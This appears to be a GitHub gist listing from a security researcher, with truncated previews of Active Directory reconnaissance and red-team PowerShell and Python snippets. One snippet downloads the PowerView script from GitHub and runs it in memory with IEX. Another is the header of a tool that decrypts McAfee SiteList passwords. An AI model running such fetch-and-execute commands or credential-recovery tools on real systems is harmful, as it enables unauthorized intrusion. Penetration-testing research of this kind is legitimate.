HarmJ0y
/ gist:57f1dac93fcc3564f9b3
Created
October 23, 2014 13:53
domain user to sid and sid to user
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # user to SID | |
| (New-Object System.Security.Principal.NTAccount("DOMAIN","USER")).Translate([System.Security.Principal.SecurityIdentifier]).Value | |
| # SID to user | |
| (New-Object System.Security.Principal.SecurityIdentifier("SID")).Translate( [System.Security.Principal.NTAccount]).Value |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SourceDomain | TargetDomain | TrustType | TrustDirection | |
|---|---|---|---|---|
| finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
| mothership.com | corp.mothership.com | ParentChild | Bidirectional | |
| mothership.com | finance.mothership.com | ParentChild | Bidirectional | |
| mothership.com | engineering.mothership.com | ParentChild | Bidirectional | |
| corp.mothership.com | mothership.com | ParentChild | Bidirectional | |
| corp.mothership.com | subsidiary.com | External | Inbound | |
| finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
| engineering.mothership.com | mothership.com | ParentChild | Bidirectional | |
| subsidiary.com | product.subsidiary.com | ParentChild | Bidirectional |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SourceDomain | TargetDomain | TrustType | TrustDirection | |
|---|---|---|---|---|
| finance.mothership.com | mothership.com | ParentChild | Bidirectional | |
| mothership.com | corp.mothership.com | ParentChild | Bidirectional | |
| mothership.com | finance.mothership.com | ParentChild | Bidirectional | |
| mothership.com | contracts.mothership.com | ParentChild | Bidirectional | |
| corp.mothership.com | mothership.com | ParentChild | Bidirectional | |
| contracts.mothership.com | mothership.com | ParentChild | Bidirectional | |
| contracts.mothership.com | product.othercompany.com | External | Inbound | |
| product.othercompany.com | contracts.mothership.com | External | Outbound | |
| product.othercompany.com | othercompany.com | ParentChild | Bidirectional |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### Keybase proof | |
| I hereby claim: | |
| * I am harmj0y on github. | |
| * I am harmj0y (https://keybase.io/harmj0y) on keybase. | |
| * I have a public key whose fingerprint is FFD5 77A3 2B3A 2B41 11F4 383A FA2F 9AA5 3110 89D3 | |
| To claim this, I am signing this object: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Translate-Canonical { | |
| <# | |
| .SYNOPSIS | |
| Converts a user@fqdn to NT4 format. | |
| .LINK | |
| http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats | |
| #> | |
| [CmdletBinding()] | |
| param( | |
| [String]$User |
HarmJ0y
/ Get-DecryptedSitelistPassword.ps1
Created
February 12, 2016 03:05
Get-DecryptedSitelistPassword.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-DecryptedSitelistPassword { | |
| # PowerShell adaptation of https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ | |
| # Original Author: Jerome Nokin (@funoverip / jerome.nokin@gmail.com) | |
| # port by @harmj0y | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory = $True)] | |
| [String] | |
| $B64Pass | |
| ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from impacket import smbserver | |
| import sys, argparse, threading, ConfigParser, time, os | |
| class ThreadedSMBServer(threading.Thread): | |
| """ | |
| Threaded SMB server that can be spun up locally. | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $RSA = New-RSAKeyPair | |
| # local tests | |
| $ComputerName = 'localhost' | |
| $StorePath = 'C:\Temp\temp.bin' | |
| Write-Host "`n[$ComputerName] AES Storepath : $StorePath" | |
| ".\secret.txt" | Write-EncryptedStore -StorePath $StorePath -Key 'Password123!' | |
| Read-EncryptedStore -StorePath $StorePath -Key 'Password123!' -List | |
| Get-EncryptedStoreData -StorePath $StorePath | Remove-EncryptedStore |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $GroupData = @{} | |
| $UserData = @{} | |
| $ServerData = @{} | |
| Import-CSV .\DomainGroups.csv | ForEach-Object { | |
| if($GroupData[$_.GroupName]) { | |
| $_.GroupName = $GroupData[$_.GroupName] | |
| } | |
| else { | |
| $guid = ([guid]::NewGuid()).Guid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Add-Type -AssemblyName System.Security | |
| $Content = (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1') | |
| $Bytes = ([Text.Encoding]::ASCII).GetBytes($Content) | |
| $EncryptedBytes = [Security.Cryptography.ProtectedData]::Protect($Bytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine) | |
| IEX (([Text.Encoding]::ASCII).GetString([Security.Cryptography.ProtectedData]::Unprotect($EncryptedBytes, $Null, [Security.Cryptography.DataProtectionScope]::LocalMachine))) |
OlderNewer